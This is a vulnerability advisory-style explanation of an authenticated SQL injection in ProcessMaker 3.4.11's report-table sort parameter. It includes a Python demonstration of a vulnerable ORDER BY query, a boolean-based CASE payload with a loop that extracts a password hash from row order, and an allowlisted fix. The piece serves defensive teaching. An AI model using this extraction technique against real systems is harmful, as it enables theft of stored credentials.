SQL Injection Vulnerability in ProcessMaker 3.4.11: Exploiting the sort Parameter in /sysworkflow/en/neoclassic/reportTables/reportTables_Ajax

CVE-2020-13525 · HIGH Severity

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

In ProcessMaker 3.4.11, the sort parameter of the report-table download endpoint /sysworkflow/en/neoclassic/reportTables/reportTables_Ajax is vulnerable to SQL injection. An attacker who holds valid credentials can trigger it with a specially crafted, authenticated HTTP request; the PR:L component of the CVSS vector reflects that authentication requirement.
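A sort parameter is a classic place for injection to survive because ORDER BY takes an identifier, and bound parameters cannot supply identifiers, so developers fall back to string concatenation. The following added example (my own illustration, not ProcessMaker's code; the table names, column names, secret value and query structure are all constructed assumptions) shows the pattern in SQLite: a listing function that concatenates the sort value, a boolean-based extraction that reads a secret from another table purely through the order of the returned rows, and a hardened version that maps the parameter onto an allowlist of columns.

```python
import sqlite3

ADMIN_HASH = "deadbeef"  # constructed sample secret the report endpoint must not expose


def make_db():
    """Build an in-memory SQLite database with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE report_rows (id INTEGER, name TEXT, amount INTEGER);
        INSERT INTO report_rows VALUES (1, 'alpha', 30), (2, 'beta', 10), (3, 'gamma', 20);
        CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '{ADMIN_HASH}');
    """)
    return conn


def list_rows_vulnerable(conn, sort):
    """Vulnerable pattern: the sort value is concatenated into ORDER BY unchanged."""
    sql = "SELECT id, name FROM report_rows ORDER BY " + sort
    return [row[1] for row in conn.execute(sql)]


def leak_bit(conn, position, guess_char):
    """Boolean-based extraction through ORDER BY.

    The injected CASE expression sorts by id when the guess is right and by -id
    when it is wrong, so the name of the first row answers a yes/no question
    about one character of the secret.
    """
    payload = (
        "(CASE WHEN (SELECT substr(password_hash,"
        f"{position},1) FROM users WHERE username='admin')='{guess_char}' "
        "THEN id ELSE -id END)"
    )
    return list_rows_vulnerable(conn, payload)[0] == "alpha"


def extract_secret(conn, length, alphabet="0123456789abcdef"):
    """Recover a secret of the given length one character at a time."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if leak_bit(conn, pos, ch):
                recovered += ch
                break
        else:
            recovered += "?"  # no candidate matched; alphabet too small
    return recovered


# Hardened pattern: the request value selects a column from a fixed map and is
# never placed in the SQL text itself.
ALLOWED_SORT = {"id": "id", "name": "name", "amount": "amount"}


def sort_is_accepted(sort):
    return sort in ALLOWED_SORT


def list_rows_hardened(conn, sort, direction="ASC"):
    col = ALLOWED_SORT.get(sort)
    if col is None:
        raise ValueError("unknown sort column")
    dir_ = "DESC" if direction.upper() == "DESC" else "ASC"  # direction is also allowlisted
    sql = f"SELECT id, name FROM report_rows ORDER BY {col} {dir_}"
    return [row[1] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print("normal sort:", list_rows_vulnerable(db, "amount"))
    print("leaked secret:", extract_secret(db, len(ADMIN_HASH)))
    print("hardened sort:", list_rows_hardened(db, "amount", "DESC"))
```

The extraction needs no error messages and no stacked queries; the row order alone is the oracle, which is why an ORDER BY sink is worth treating as seriously as one in a WHERE clause. The allowlist approach is the standard fix: validate the parameter against the set of columns the page actually sorts by, and reject anything else before the query is built.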